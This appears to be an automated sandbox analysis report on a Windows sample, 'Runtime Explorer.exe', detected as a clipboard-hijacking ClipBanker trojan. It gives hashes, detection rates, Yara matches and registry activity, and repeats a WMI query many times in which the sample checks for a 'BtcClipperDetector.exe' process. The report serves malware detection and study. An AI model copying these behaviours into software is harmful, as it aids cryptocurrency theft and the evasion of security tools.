Windows Analysis Report
Runtime Explorer.exe

Overview

General Information

Sample Name:Runtime Explorer.exe
Analysis ID:599518
MD5:d42c2456ea9de66a75a29dea464a4e4d
SHA1:1e8ce36d82aab5d9ae09630bf01a77d92778d603
SHA256:907e7f7e2ee47c955cf315747ab913b591e9046f51c0f3ba9a6eef696346198e
Tags:exe

Detection

Clipboard Hijacker
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Clipboard Hijacker
Multi AV Scanner detection for submitted file
Uses Windows timers to delay execution
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Program does not show much activity (idle)

Classification

Classification chart categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Legend: clean, suspicious, malicious.
  • System is w10x64
  • Runtime Explorer.exe (PID: 6616 cmdline: "C:\Users\user\Desktop\Runtime Explorer.exe" MD5: D42C2456EA9DE66A75A29DEA464A4E4D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Runtime Explorer.exe | JoeSecurity_Clipboard_Hijacker_3 | Yara detected Clipboard Hijacker | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_Clipboard_Hijacker_3 | Yara detected Clipboard Hijacker | Joe Security |
00000000.00000000.430713298.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_Clipboard_Hijacker_3 | Yara detected Clipboard Hijacker | Joe Security |
Process Memory Space: Runtime Explorer.exe PID: 6616 | JoeSecurity_Clipboard_Hijacker_3 | Yara detected Clipboard Hijacker | Joe Security |

Source | Rule | Description | Author | Strings
0.2.Runtime Explorer.exe.400000.0.unpack | JoeSecurity_Clipboard_Hijacker_3 | Yara detected Clipboard Hijacker | Joe Security |
0.0.Runtime Explorer.exe.400000.0.unpack | JoeSecurity_Clipboard_Hijacker_3 | Yara detected Clipboard Hijacker | Joe Security |

No Sigma rule has matched

AV Detection

Source: Runtime Explorer.exe | Avira: detected
Source: Runtime Explorer.exe | Virustotal: Detection: 73%
Source: Runtime Explorer.exe | Metadefender: Detection: 40%
Source: Runtime Explorer.exe | ReversingLabs: Detection: 69%
Source: 0.0.Runtime Explorer.exe.400000.0.unpack | Avira: Label: TR/ClipBanker.avslj
Source: Runtime Explorer.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Runtime Explorer.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\Runtime Explorer.exe | File created: C:\Users\user\AppData\Local\Temp\~DF685518F28E77605E.TMP
Source: Runtime Explorer.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Runtime Explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Runtime Explorer.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: classification engine | Classification label: mal68.spyw.evad.winEXE@1/0@0/0
Source: unknown | Process created: C:\Users\user\Desktop\Runtime Explorer.exe
Source: C:\Users\user\Desktop\Runtime Explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\Runtime Explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
